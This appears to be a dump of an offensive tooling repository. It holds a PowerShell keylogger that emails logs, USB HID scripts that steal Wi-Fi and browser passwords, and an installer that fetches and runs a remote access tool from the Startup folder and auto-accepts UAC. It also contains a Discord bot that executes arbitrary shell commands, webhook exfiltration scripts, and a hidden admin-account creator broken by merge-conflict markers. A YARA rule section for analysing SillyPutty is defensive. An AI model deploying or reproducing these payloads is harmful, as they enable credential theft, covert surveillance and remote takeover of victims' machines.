| [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] 25 | public static extern short GetAsyncKeyState(int virtualKeyCode); 26 | [DllImport("user32.dll", CharSet=CharSet.Auto)] 27 | public static extern int GetKeyboardState(byte[] keystate); 28 | [DllImport("user32.dll", CharSet=CharSet.Auto)] 29 | public static extern int MapVirtualKey(uint uCode, int uMapType); 30 | [DllImport("user32.dll", CharSet=CharSet.Auto)] 31 | public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags); 32 | '@ 33 | 34 | # set up API 35 | $API = Add-Type -MemberDefinition $APIsignatures -Name 'Win32' -Namespace API -PassThru 36 | 37 | # attempt to log keystrokes 38 | try { 39 | while ($true) { 40 | Start-Sleep -Milliseconds 40 41 | 42 | for ($ascii = 9; $ascii -le 254; $ascii++) { 43 | 44 | # use API to get key state 45 | $keystate = $API::GetAsyncKeyState($ascii) 46 | 47 | # use API to detect keystroke 48 | if ($keystate -eq -32767) { 49 | $null = [console]::CapsLock 50 | 51 | # map virtual key 52 | $mapKey = $API::MapVirtualKey($ascii, 3) 53 | 54 | # create a stringbuilder 55 | $keyboardState = New-Object Byte[] 256 56 | $hideKeyboardState = $API::GetKeyboardState($keyboardState) 57 | $loggedchar = New-Object -TypeName System.Text.StringBuilder 58 | 59 | # translate virtual key 60 | if ($API::ToUnicode($ascii, $mapKey, $keyboardState, $loggedchar, $loggedchar.Capacity, 0)) { 61 | # add logged key to file 62 | [System.IO.File]::AppendAllText($logFile, $loggedchar, [System.Text.Encoding]::Unicode) 63 | } 64 | } 65 | } 66 | } 67 | } 68 | 69 | # send logs if code fails 70 | finally { 71 | # send email 72 | $smtp.Send($email, $email, $subject, $logs); 73 | } 74 | } 75 | 76 | # run keylogger 77 | KeyLogger -------------------------------------------------------------------------------- /bashbunny/BunnyLogger/payload.txt: -------------------------------------------------------------------------------- 1 | # Title: Bash Bunny Keylogger 2 | # Description: A keylogger for the bash bunny 3 | # Author: Blue Cosmo 4 | # Category: General 5 | # Target: Windows 10 6 | # Attackmodes: HID, STORAGE 7 | 8 | # set up payload 9 | LED SETUP 10 | GET SWITCH_POSITION 11 | ATTACKMODE HID STORAGE 12 | 13 | # open powershell 14 | LED STAGE1 15 | RUN WIN powershell 16 | 17 | # run duckysript file 'duckyscript.txt' 18 | LED STAGE2 19 | QUACK ${SWITCH_POSITION}/duckyscript.txt 20 | 21 | # end payload 22 | LED FINISH -------------------------------------------------------------------------------- /bashbunny/OnlyBUGS/README.md: -------------------------------------------------------------------------------- 1 | ## OnlyBUGS 2 | This is an installer for OnlyRAT that uses the [Bash Bunny](https://shop.hak5.org/products/bash-bunny). 3 | 4 | ## Download: 5 | ```bash 6 | svn checkout https://github.com/CosmodiumCS/MalwareDNA/trunk/bashbunny/OnlyBUGS 7 | ``` 8 | 9 | ## Instructions: 10 | 1. in line 18 of `duckyscript.txt`, repalce `DISCORDWEBHOOK` with your discord webhook 11 | ``` 12 | STRING echo DISCORDWEBHOOK > lawFvVTikZ.txt 13 | ``` 14 | 2. add `payload.txt` and `duckyscript.txt` to a switch position on your BashBunny 15 | 3. deploy! 16 | -------------------------------------------------------------------------------- /bashbunny/OnlyBUGS/duckyscript.txt: -------------------------------------------------------------------------------- 1 | REM OnlyRAT installer via the USB Rubber Ducky 2 | REM Created by : C0SM0 3 | 4 | REM open the command linve via the runbox 5 | DELAY 1000 6 | GUI r 7 | DELAY 400 8 | STRING cmd 9 | ENTER 10 | 11 | REM execute discord webhook installer 12 | DELAY 800 13 | STRING set "YKHfpmMRoQ=C:/Users/%username%/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup" 14 | ENTER 15 | STRING cd %YKHfpmMRoQ% 16 | ENTER 17 | REM replace "DISCORDWEBHOOK" with your Discord Webhook 18 | STRING echo DISCORDWEBHOOK > lawFvVTikZ.txt 19 | ENTER 20 | STRING powershell powershell.exe -windowstyle hidden "Invoke-WebRequest -Uri raw.githubusercontent.com/CosmodiumCS/OnlyRAT/main/payloads/dw1.cmd -OutFile wEaoFkNduy.cmd" 21 | ENTER 22 | DELAY 200 23 | STRING powershell ./wEaoFkNduy.cmd && exit 24 | ENTER 25 | 26 | REM UAC bypass 27 | DELAY 1800 28 | ALT y -------------------------------------------------------------------------------- /bashbunny/OnlyBUGS/payload.txt: -------------------------------------------------------------------------------- 1 | # Title: OnlyBunny 2 | # Description: Installs OnlyRAT on computers 3 | # Author: Blue Cosmo 4 | # Category: remote access 5 | # Target: Windows 10 6 | # Attackmodes: HID 7 | 8 | # setup payload 9 | LED SETUP 10 | ATTACKMODE HID 11 | GET SWITCH_POSITION 12 | 13 | # execute duckyscript 14 | LED STAGE1 15 | QUACK ${SWITCH_POSITION}/duckyscript.txt 16 | 17 | LED FINISH 18 | -------------------------------------------------------------------------------- /bashbunny/geofencing/payload.txt: -------------------------------------------------------------------------------- 1 | # Title: Bash Bunny Geofencing 2 | # Description: a POC for geofencing 3 | # Author: Blue Cosmo 4 | # Category: POC 5 | # Target: Windows 10 6 | # Attackmodes: HID 7 | 8 | # website opener payload 9 | 10 | # configure bash bunny 11 | LED SETUP 12 | ATTACKMODE HID 13 | 14 | # replace "device" with your bluetooth device 15 | WAIT_FOR_PRESENT device 16 | 17 | # opens website [ccs] 18 | LED STAGE1 19 | RUN WIN www.cosmodiumcs.com 20 | 21 | LED FINISH 22 | -------------------------------------------------------------------------------- /bashbunny/helloworld/payload.txt: -------------------------------------------------------------------------------- 1 | # Title: Hello, World! 2 | # Description: opens notepad, types "Hello, World!" 3 | # Author: Blue Cosmo [Chris Taylor] 4 | # Category: poc 5 | # Target: Windows 10 6 | # Attackmodes: HID 7 | 8 | # configures bunny 9 | LED SETUP 10 | ATTACKMODE HID 11 | 12 | # opens notepad 13 | LED STAGE1 14 | RUN WIN Notepad.exe 15 | 16 | # write content to notepad 17 | LED STAGE2 18 | QUACK DELAY 400 19 | QUACK STRING Hello, World! 20 | 21 | LED FINISH 22 | -------------------------------------------------------------------------------- /bashbunny/remote-trigger/payload.txt: -------------------------------------------------------------------------------- 1 | # Title: BashBunny Remote Triggers 2 | # Description: a POC for remote triggering 3 | # Author: Blue Cosmo 4 | # Category: POC 5 | # Target: Windows 10 6 | # Attackmodes: HID 7 | 8 | # hello world payload 9 | 10 | # configure bash bunny 11 | LED SETUP 12 | ATTACKMODE HID 13 | 14 | # replace "device" with your bluetooth device 15 | WAIT_FOR_PRESENT device 16 | # WAIT_FOR_NOT_PRESENT is also an option 17 | 18 | # open notepad 19 | LED STAGE1 20 | RUN WIN notepad.exe 21 | 22 | # write "hello, world" to notepad 23 | LED STAGE2 24 | QUACK DELAY 400 25 | QUACK STRING Hello, World! 26 | 27 | LED FINISH 28 | -------------------------------------------------------------------------------- /bashbunny/webcredential-gui/P.cfg: -------------------------------------------------------------------------------- 1 | [General] 2 | ShowGridLines=0 3 | SaveFilterIndex=1 4 | ShowInfoTip=1 5 | MarkOddEvenRows=0 6 | ShowTimeInGMT=0 7 | LoadPasswordsIE=1 8 | LoadPasswordsFirefox=1 9 | LoadPasswordsChrome=1 10 | LoadPasswordsOpera=1 11 | LoadPasswordsSafari=1 12 | LoadPasswordsSeaMonkey=1 13 | LoadPasswordsYandex=1 14 | LoadPasswordsVivaldi=1 15 | LoadPasswordsWaterfox=1 16 | LoadPasswordsBrave=1 17 | UseFirefoxProfileFolder=0 18 | UseFirefoxInstallFolder=0 19 | UseChromeProfileFolder=0 20 | UseOperaPasswordFile=0 21 | FirefoxProfileFolder= 22 | FirefoxInstallFolder= 23 | ChromeProfileFolder= 24 | OperaPasswordFile= 25 | SaveFileEncoding=0 26 | UseQuickFilter=0 27 | QuickFilterString= 28 | QuickFilterColumnsMode=1 29 | QuickFilterFindMode=1 30 | WinPos=2C 00 00 00 00 00 00 00 01 00 00 00 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 00 00 00 00 00 00 00 00 80 02 00 00 E0 01 00 00 31 | Columns=FA 00 00 00 78 00 01 00 96 00 02 00 96 00 03 00 64 00 04 00 78 00 05 00 78 00 06 00 78 00 07 00 78 00 08 00 C8 00 09 00 32 | Sort=0 33 | -------------------------------------------------------------------------------- /bashbunny/webcredential-gui/P.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/bashbunny/webcredential-gui/P.exe -------------------------------------------------------------------------------- /bashbunny/webcredential-gui/README.md: -------------------------------------------------------------------------------- 1 | # Web Credential Stealer 2 | > Blue Cosmo 3 | 4 | # Requirements 5 | bashbunny, twinduck labled "P", or usb drive labled "P" 6 | 7 | ## Overview 8 | steals web credentials from windows 10 computer 9 | 10 | ## Download: 11 | ```bash 12 | svn checkout https://github.com/CosmodiumCS/MalwareDNA/trunk/bashbunny/webcredential-gui 13 | ``` 14 | 15 | ## Setup 16 | you must run the "P.exe" file in your microSD card before using this payload 17 | - a "P.cfg" file should appear 18 | -------------------------------------------------------------------------------- /bashbunny/webcredential-gui/WebBrowserPassView.chm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/bashbunny/webcredential-gui/WebBrowserPassView.chm -------------------------------------------------------------------------------- /bashbunny/webcredential-gui/ducky-script.txt: -------------------------------------------------------------------------------- 1 | REM Exfiltrate Web passwords to usb, bashbunny, or twinduck 2 | REM Created By : Blue Cosmo 3 | 4 | REM let computer recognize twinduck 5 | DELAY 1000 6 | 7 | REM open powershell via runbox 8 | GUI r 9 | DELAY 200 10 | STRING powershell 11 | ENTER 12 | DELAY 300 13 | 14 | REM cd into drive labeled "BASHBUNNY", add path to clipboard 15 | STRING $u=gwmi Win32_Volume|?{$_.Label -eq'BASHBUNNY'}|select name;cd $u.name 16 | ENTER 17 | DELAY 200 18 | STRING mkdir loot\$env:UserName 19 | ENTER 20 | DELAY 200 21 | STRING cd .\payloads\switch1\ 22 | ENTER 23 | DELAY 200 24 | STRING $u.name+"loot\"+$env:UserName | clip 25 | ENTER 26 | 27 | REM run "P.exe" and save creds to drive 28 | DELAY 100 29 | STRING ./P.exe; exit 30 | ENTER 31 | DELAY 3000 32 | CTRL a 33 | CTRL s 34 | DELAY 200 35 | STRING pw.txt 36 | ALT d 37 | CTRL v 38 | ENTER 39 | ALT s 40 | DELAY 100 41 | ALT F4 42 | -------------------------------------------------------------------------------- /bashbunny/webcredential-gui/payload.txt: -------------------------------------------------------------------------------- 1 | LED SETUP 2 | 3 | GET SWITCH_POSITION 4 | 5 | ATTACKMODE HID STORAGE 6 | 7 | 8 | if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/ducky-script.txt" ]; then 9 | 10 | 11 | #Call ducky script 12 | LED STAGE1 13 | 14 | 15 | QUACK ${SWITCH_POSITION}/ducky-script.txt 16 | 17 | QUACK DELAY 10000 18 | 19 | LED FINISH 20 | 21 | else 22 | 23 | LED FAIL 24 | 25 | #Red LED if unable to load script 26 | echo "Unable to load ducky-script.txt" >> /root/debuglog.txt 27 | 28 | exit 1 29 | 30 | fi -------------------------------------------------------------------------------- /bashbunny/wifi-credentials/README.md: -------------------------------------------------------------------------------- 1 | steals wifi credentials 2 | 3 | ## install 4 | ```bash 5 | svn checkout https://github.com/CosmodiumCS/MalwareDNA/trunk/bashbunny/wifi-credentials 6 | ``` 7 | -------------------------------------------------------------------------------- /bashbunny/wifi-credentials/ducky-script.txt: -------------------------------------------------------------------------------- 1 | REM bashbunny wifi password stealer 2 | REM created by : blue cosmo 3 | 4 | REM open powershell 5 | GUI r 6 | DELAY 200 7 | STRING powershell 8 | ENTER 9 | DELAY 300 10 | 11 | REM cd into bashbunny labled 'BashBunny' 12 | STRING $u=gwmi Win32_Volume|?{$_.Label -eq'BashBunny'}|select name;cd $u.name 13 | ENTER 14 | DELAY 100 15 | STRING cd loot 16 | ENTER 17 | DELAY 100 18 | 19 | REM save wifi passwords to a file 20 | REM file will be named after the username 21 | STRING (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize >$env:UserName".txt"; exit 22 | ENTER 23 | -------------------------------------------------------------------------------- /bashbunny/wifi-credentials/payload.txt: -------------------------------------------------------------------------------- 1 | # Title: Wifi Password Stealer 2 | # Description: steals wifi passwords via powershell 3 | # Author: Blue Cosmo 4 | # Category: credentials 5 | # Target: Windows 10 6 | # Attackmodes: HID, STORAGE 7 | 8 | # set up payload 9 | LED SETUP 10 | GET SWITCH_POSITION 11 | ATTACKMODE HID STORAGE 12 | 13 | # run duckysript file 'ducky-script.txt' 14 | LED STAGE1 15 | QUACK ${SWITCH_POSITION}/ducky-script.txt 16 | 17 | # end payload 18 | LED FINISH 19 | -------------------------------------------------------------------------------- /discord/bot.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | # bot 3 | # created by : bluecosmo (chris) 4 | 5 | import discord 6 | import subprocess 7 | 8 | TOKEN = "TOKEN" 9 | 10 | intents = discord.Intents.default() 11 | intents.message_content = True 12 | client = discord.Client(intents=intents) 13 | 14 | @client.event 15 | async def on_ready(): 16 | print(f'{client.user} has connected to Discord!') 17 | 18 | # execute system commands 19 | @client.event 20 | async def execute(message, cmd): 21 | cmd_output = subprocess.check_output(cmd, shell=True, universal_newlines=True) 22 | await message.channel.send(cmd_output[:2000]) 23 | return 24 | 25 | @client.event 26 | async def on_message(message): 27 | msg = str(message.content) 28 | 29 | if msg.startswith('$'): 30 | cmd = msg[1:].strip() 31 | await execute(message, cmd) 32 | 33 | client.run(TOKEN) 34 | -------------------------------------------------------------------------------- /discord/exfiltration-screen.ps1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/discord/exfiltration-screen.ps1 -------------------------------------------------------------------------------- /discord/exfiltration-wifi.ps1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/discord/exfiltration-wifi.ps1 -------------------------------------------------------------------------------- /discord/get-webhook.cmd: -------------------------------------------------------------------------------- 1 | REM get info from webhook 2 | REM created by : cosmo 3 | 4 | @echo off 5 | set "webhook=WEBHOOK" 6 | curl.exe -G %webhook% 7 | -------------------------------------------------------------------------------- /discord/get-webhook.ps1: -------------------------------------------------------------------------------- 1 | # get info from webhook 2 | # created by : cosmo 3 | 4 | $webhook = "WEBHOOK" 5 | curl.exe -G $webhook 6 | 7 | -------------------------------------------------------------------------------- /discord/get-webhook.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # get info from webhook 3 | # created by : cosmo 4 | 5 | curl -G WEBHOOK 6 | -------------------------------------------------------------------------------- /discord/send-file.cmd: -------------------------------------------------------------------------------- 1 | REM send file to webhook 2 | REM created by : cosmo 3 | 4 | curl.exe -F "payload_json={\"username\": \"cosmo\", \"content\": \"download me\"}" -F "file=@file.txt" WEBHOOK 5 | -------------------------------------------------------------------------------- /discord/send-file.ps1: -------------------------------------------------------------------------------- 1 | # send file to webhook 2 | # created by : cosmo 3 | 4 | curl.exe -F "payload_json={\`"username\`": \`"cosmo\`", \`"content\`": \`"download me\`"}" WEBHOOK 5 | 6 | -------------------------------------------------------------------------------- /discord/send-file.sh: -------------------------------------------------------------------------------- 1 | # send file to webhook 2 | # created by : cosmo 3 | 4 | curl -F "payload_json={\"username\": \"cosmo\", \"content\": \"download me\"}" WEBHOOK 5 | -------------------------------------------------------------------------------- /discord/send-message.cmd: -------------------------------------------------------------------------------- 1 | curl.exe -F "payload_json={\"username\": \"cosmo\", \"content\": \"download me\"}" WEBHOOK 2 | -------------------------------------------------------------------------------- /discord/send-message.ps1: -------------------------------------------------------------------------------- 1 | # send message to webhook 2 | # created by : cosmo 3 | 4 | curl.exe -F "payload_json={\`"username\`": \`"cosmo\`", \`"content\`": \`"download me\`"}" WEBHOOK 5 | -------------------------------------------------------------------------------- /discord/send-message.sh: -------------------------------------------------------------------------------- 1 | # send message to webhook 2 | # created by : cosmo 3 | 4 | curl -F "payload_json={\"username\": \"cosmo\", \"content\": \"download me\"}" WEBHOOK 5 | -------------------------------------------------------------------------------- /privesc/create-admin.ps1: -------------------------------------------------------------------------------- 1 | <<<<<<< HEAD 2 | function geIwCZloBx { 3 | [CmdletBinding()] 4 | param ( 5 | [string] $sqbXFdLvyw, 6 | [securestring] $CBFXIYeWPR 7 | ======= 8 | function create_admin { 9 | [CmdletBinding()] 10 | param ( 11 | [string] $admin_username, 12 | [securestring] $admin_password_secure 13 | >>>>>>> 63fbf5bf718b9e1e4932c91c05fb131c42385c11 14 | ) 15 | begin { 16 | } 17 | process { 18 | <<<<<<< HEAD 19 | New-LocalUser "$sqbXFdLvyw" -Password $CBFXIYeWPR -FullName "$sqbXFdLvyw" -Description "Temporary local admin" 20 | Write-Verbose "$sqbXFdLvyw local user crated" 21 | Add-LocalGroupMember -Group "Administrators" -Member "$sqbXFdLvyw" 22 | Write-Verbose "$sqbXFdLvyw added to the local administrator group" 23 | ======= 24 | New-LocalUser "$admin_username" -Password $admin_password_secure -FullName "$admin_username" -Description "Temporary local admin" 25 | Write-Verbose "$admin_username local user crated" 26 | Add-LocalGroupMember -Group "Administrators" -Member "$admin_username" 27 | Write-Verbose "$admin_username added to the local administrator group" 28 | >>>>>>> 63fbf5bf718b9e1e4932c91c05fb131c42385c11 29 | } 30 | end { 31 | } 32 | } 33 | 34 | <<<<<<< HEAD 35 | Remove-LocalUser -Name "onlyrat" 36 | $sqbXFdLvyw = "onlyrat" 37 | $DCilJFugpP = RpLGWiUsIy 38 | $CBFXIYeWPR = (ConvertTo-SecureString $DCilJFugpP -AsPlainText -Force) 39 | geIwCZloBx -sqbXFdLvyw $sqbXFdLvyw -CBFXIYeWPR $CBFXIYeWPR 40 | ======= 41 | Remove-LocalUser -Name "admin-user" 42 | $admin_username = "admin-user" 43 | $admin_password = "password" 44 | $admin_password_secure = (ConvertTo-SecureString $admin_password -AsPlainText -Force) 45 | create_admin -admin_username $admin_username -CBFXIYeWPR $admin_password_secure 46 | >>>>>>> 63fbf5bf718b9e1e4932c91c05fb131c42385c11 47 | -------------------------------------------------------------------------------- /privesc/getadmin.cmd: -------------------------------------------------------------------------------- 1 | REM get admin permissions for script 2 | @echo off 3 | :: BatchGotAdmin 4 | :------------------------------------- 5 | REM --> check for permissions 6 | IF "%PROCESSOR_ARCHITECTURE%" EQU "amd64" ( 7 | >nul 2>&1 "%SYSTEMROOT%\SysWOW64\cacls.exe" "%SYSTEMROOT%\SysWOW64\config\system" 8 | ) ELSE ( 9 | >nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system" 10 | ) 11 | 12 | REM --> if error flag set, we do not have admin. 13 | if '%errorlevel%' NEQ '0' ( 14 | echo Requesting administrative privileges... 15 | goto UACPrompt 16 | ) else ( goto gotAdmin ) 17 | 18 | :UACPrompt 19 | echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs" 20 | set params= %* 21 | echo UAC.ShellExecute "cmd.exe", "/c ""%~s0"" %params:"=""%", "", "runas", 1 >> "%temp%\getadmin.vbs" 22 | 23 | "%temp%\getadmin.vbs" 24 | del "%temp%\getadmin.vbs" 25 | exit /B 26 | 27 | :gotAdmin 28 | pushd "%CD%" 29 | CD /D "%~dp0" 30 | 31 | @REM will start as admin 32 | start -------------------------------------------------------------------------------- /privesc/uac-prompt.cmd: -------------------------------------------------------------------------------- 1 | REM get admin permissions for script 2 | @echo off 3 | :: BatchGotAdmin 4 | :------------------------------------- 5 | REM --> check for permissions 6 | IF "%PROCESSOR_ARCHITECTURE%" EQU "amd64" ( 7 | >nul 2>&1 "%SYSTEMROOT%\SysWOW64\cacls.exe" "%SYSTEMROOT%\SysWOW64\config\system" 8 | ) ELSE ( 9 | >nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system" 10 | ) 11 | 12 | REM --> if error flag set, we do not have admin. 13 | if '%errorlevel%' NEQ '0' ( 14 | echo Requesting administrative privileges... 15 | goto UACPrompt 16 | ) else ( goto gotAdmin ) 17 | 18 | :UACPrompt 19 | echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs" 20 | set params= %* 21 | echo UAC.ShellExecute "cmd.exe", "/c ""%~s0"" %params:"=""%", "", "runas", 1 >> "%temp%\getadmin.vbs" 22 | 23 | "%temp%\getadmin.vbs" 24 | del "%temp%\getadmin.vbs" 25 | exit /B 26 | 27 | :gotAdmin 28 | pushd "%CD%" 29 | CD /D "%~dp0" 30 | 31 | @REM will start as admin 32 | start -------------------------------------------------------------------------------- /reports/README.md: -------------------------------------------------------------------------------- 1 | zip archive password : `infected` 2 | -------------------------------------------------------------------------------- /reports/sillyputty/README.md: -------------------------------------------------------------------------------- 1 | - [live analysis](https://www.youtube.com/live/NrPUtV_53hQ?feature=share) 2 | - [live reporting](https://www.youtube.com/live/9OpIt_fi8mc?feature=share) 3 | -------------------------------------------------------------------------------- /reports/sillyputty/SillyPutty-MalwareAnalysisReport.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/reports/sillyputty/SillyPutty-MalwareAnalysisReport.pdf -------------------------------------------------------------------------------- /reports/sillyputty/putty.7z: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/reports/sillyputty/putty.7z -------------------------------------------------------------------------------- /reports/sillyputty/sillyputty.yara: -------------------------------------------------------------------------------- 1 | rule putty_exe { 2 | 3 | meta: 4 | last_updated = "2023-05-06" 5 | author = "C0SM0" 6 | description = "YARA rules for SillyPutty (putty.exe)" 7 | 8 | strings: 9 | 10 | // putty.exe 11 | $magic_bytes = "MZ" 12 | $powershell_execution = "powershell.exe -nop -w hidden -noni -ep bypass \"&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('" 13 | $base64_payload = "H4sIAOW/UWECA51W227jNhB991cMXHUtIRbhdbdAESCLepVsGyDdNVZu82AYCE2NYzUyqZKUL0j87yUlypLjBNtUL7aGczlz5kL9AGOxQbkoOIRwK1OtkcN8B5/Mz6SQHCW8g0u6RvidymTX6RhNplPB4TfU4S3OWZYi19B57IB5vA2DC/iCm/Dr/G9kGsLJLscvdIVGqInRj0r9Wpn8qfASF7TIdCQxMScpzZRx4WlZ4EFrLMV2R55pGHlLUut29g3EvE6t8wjl+ZhKuvKr/9NYy5Tfz7xIrFaUJ/1jaawyJvgz4aXY8EzQpJQGzqcUDJUCR8BKJEWGFuCvfgCVSroAvw4DIf4D3XnKk25QHlZ2pW2WKkO/ofzChNyZ/ytiWYsFe0CtyITlN05j9suHDz+dGhKlqdQ2rotcnroSXbT0Roxhro3Dqhx+BWX/GlyJa5QKTxEfXLdK/hLyaOwCdeeCF2pImJC5kFRj+U7zPEsZtUUjmWA06/Ztgg5Vp2JWaYl0ZdOoohLTgXEpM/Ab4FXhKty2ibquTi3USmVx7ewV4MgKMww7Eteqvovf9xam27DvP3oT430PIVUwPbL5hiuhMUKp04XNCv+iWZqU2UU0y+aUPcyC4AU4ZFTope1nazRSb6QsaJW84arJtU3mdL7TOJ3NPPtrm3VAyHBgnqcfHwd7xzfypD72pxq3miBnIrGTcH4+iqPr68DW4JPV8bu3pqXFRlX7JF5iloEsODfaYBgqlGnrLpyBh3x9bt+4XQpnRmaKdThgYpUXujm845HIdzK9X2rwowCGg/c/wx8pk0KJhYbIUWJJgJGNaDUVSDQB1piQO37HXdc6Tohdcug32fUH/eaF3CC/18t2P9Uz3+6ok4Z6G1XTsxncGJeWG7cvyAHn27HWVp+FvKJsaTBXTiHlh33UaDWw7eMfrfGA1NlWG6/2FDxd87V4wPBqmxtuleH74GV/PKRvYqI3jqFn6lyiuBFVOwdkTPXSSHsfe/+7dJtlmqHve2k5A5X5N6SJX3V8HwZ98I7sAgg5wuCktlcWPiYTk8prV5tbHFaFlCleuZQbL2b8qYXS8ub2V0lznQ54afCsrcy2sFyeFADCekVXzocf372HJ/ha6LDyCo6KI1dDKAmpHRuSv1MC6DVOthaIh1IKOR3MjoK1UJfnhGVIpR+8hOCi/WIGf9s5naT/1D6Nm++OTrtVTgantvmcFWp5uLXdGnSXTZQJhS6f5h6Ntcjry9N8eXQOXxyH4rirE0J3L9kF8i/mtl93dQkAAA==" 14 | 15 | condition: 16 | (($magic_bytes at 0) and $base64_payload) 17 | or 18 | ($magic_bytes at 0) and $powershell_execution 19 | 20 | 21 | } 22 | 23 | // powerfun.ps1 24 | rule powerfun_ps1 { 25 | 26 | meta: 27 | last_updated = "2023-05-06" 28 | author = "C0SM0" 29 | description = "YARA rules for SillyPutty (powerfun.ps1)" 30 | 31 | strings: 32 | $domain = "bonus2.corporatebonusapplication.local" 33 | $port = "8443" 34 | $authors = "# Powerfun - Written by Ben Turner & Dave Hardy" 35 | $execution = "powerfun -Command reverse -Sslcon true" 36 | $tcp_listener = "[System.Net.Sockets.TcpListener]" 37 | $tcp_client = "System.Net.Sockets.TCPClient" 38 | 39 | condition: 40 | ($domain and $port) 41 | or 42 | ($tcp_listener and $tcp_client) 43 | or 44 | $execution 45 | or 46 | $authors 47 | 48 | } -------------------------------------------------------------------------------- /rubberducky/DucKey-Logger/LICENSE: -------------------------------------------------------------------------------- 1 | BSD 3-Clause License [MODIFIED] 2 | 3 | Copyright (c) 2020, Cosmodium CyberSecurity 4 | All rights reserved. 5 | 6 | Redistribution and use in source and binary forms, with or without 7 | modification, are permitted provided that the following conditions are met: 8 | 9 | * Redistributions of source code must retain the above copyright notice, this 10 | list of conditions and the following disclaimer. 11 | 12 | * Redistributions in binary form must reproduce the above copyright notice, 13 | this list of conditions and the following disclaimer in the documentation 14 | and/or other materials provided with the distribution. 15 | 16 | * Neither the name of the copyright holder nor the names of its 17 | contributors may be used to endorse or promote products derived from 18 | this software without specific prior written permission. 19 | 20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 21 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 22 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 23 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 24 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 25 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 26 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 27 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 28 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 29 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 30 | 31 | The above copyright notice and this permission notice shall be included in all 32 | copies or substantial portions of the Software. -------------------------------------------------------------------------------- /rubberducky/DucKey-Logger/README.md: -------------------------------------------------------------------------------- 1 | # DucKey Logger V.2 2 | > Chris Taylor [Blue Cosmo] | 08/24/21 3 | --- 4 | 5 | ``` 6 | ::::::::: ::: ::: :::::::: ::: ::: :::::::::: ::: ::: 7 | :+: :+: :+: :+: :+: :+: :+: :+: :+: :+: :+: 8 | +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ 9 | +#+ +:+ +#+ +:+ +#+ +#++:++ +#++:++# +#++: 10 | +#+ +#+ +#+ +#+ +#+ +#+ +#+ +#+ +#+ 11 | #+# #+# #+# #+# #+# #+# #+# #+# #+# #+# 12 | ######### ######## ######## ### ### ########## ### 13 | ``` 14 | 15 | ## Update: 16 | logs can now be sent every hour 17 | 18 | ## Overview: 19 | ``` 20 | DucKey Logger is a USB RubberDucky payload that uses PowerShell to log keystrokes 21 | ``` 22 | - moves *c.cmd* file to windows startup directory 23 | - *c.cmd* will secretly run *p.ps1* 24 | - *p.ps1* will log keystrokes 25 | - *l.ps1* will email the logs every startup and every hour [via SMTP] 26 | - sends logs hourly, regardless of system time 27 | 28 | ## Resources: 29 | - [YouTube Video](https://www.youtube.com/watch?v=uHIZZYFeVJA) 30 | - [YouTube Channel](https://youtube.com/cosmodiumcs) 31 | - [Website](https://cosmodiumcs.com) 32 | 33 | ## Requirements: 34 | - Twin-Duck firmware 35 | - Gmail account 36 | - i suggest making a separate Gmail account for this payload 37 | - your Gmail must have [LSA Access](https://myaccount.google.com/lesssecureapps?pli=1&rapt=AEjHL4Px2VEFPoFPEuLutMD6UhNVRyY9P3s7l-pCGA53NBqilKVrtltrfS1823x5i6k6_pSEVp6jkEW0zKQT2CHN0WXh4fvGiw) enabled 38 | - Windows 10 Target 39 | 40 | ## Download: 41 | ```bash 42 | svn checkout https://github.com/CosmodiumCS/MalwareDNA/trunk/rubberducky/DucKey-Logger 43 | ``` 44 | 45 | ## Instructions: 46 | 